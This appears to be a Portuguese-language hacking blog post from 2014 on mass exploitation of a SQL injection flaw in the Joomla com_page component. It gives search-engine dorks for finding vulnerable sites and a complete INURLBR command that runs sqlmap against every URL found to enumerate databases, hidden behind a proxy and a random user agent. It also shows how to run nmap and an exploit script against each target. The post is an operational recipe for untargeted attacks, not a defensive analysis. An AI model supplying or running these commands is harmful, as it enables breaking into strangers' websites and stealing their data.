quarta-feira, 17 de dezembro de 2014

INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --command-all

Joomla Component com_page - SQL Injection
INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --comand-all
Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:
DORK[1]:
inurl:index.php?option=com_page&id_p=
--------------------------------------------------------------------------------------
DORK[2]: 
intext:option=com_page
--------------------------------------------------------------------------------------

Otimizando a busca
Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.

Logica de processo:
  1. BUSCAR ALVOS EM MOTORES DE BUSCA.
  2. RETIRAR URLS INDESEJADAS.
  3. RETIRAR DUPLICATAS.
  4. CONVERTER VALORES EM UM ARRAY DE DADOS.
  5. ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
  6. ANALISAR ERROS PADRÕES OU PERSONALIZAS.
  7. SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL) 
  8. ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.

Usando SCANNER INURLBR:
Comando->{

Exmplo:
./inurlbr.php 
--dork 'YOUR_DORK' 
-s OUTPUT.txt  
-q  {OP_MOTOR_SEARCH}
--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'

Usando:
./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

Observação parâmetro --command-all:
Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

Indo a fundo em --command-*
--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.
      Exemplo: --command-vul {comando}
      Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '
               --command-vul './exploit.sh _TARGET_ output.txt'

  --command-all Utilize este comand para especificar um único comando a cada URL encontrado.
      Exemplo: --command-all {comando}
      Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'
               --command-all './exploit.sh _TARGET_ output.txt'

observação:

     _TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br

    _TARGETFULL_ Será substituído pelo URL / alvo original encontrado.
Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste

Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.
sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

RESULTADO:
Observação parâmetro --comand-all: Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca. Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP, O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

}


Referencias

Nenhum comentário:

Postar um comentário

............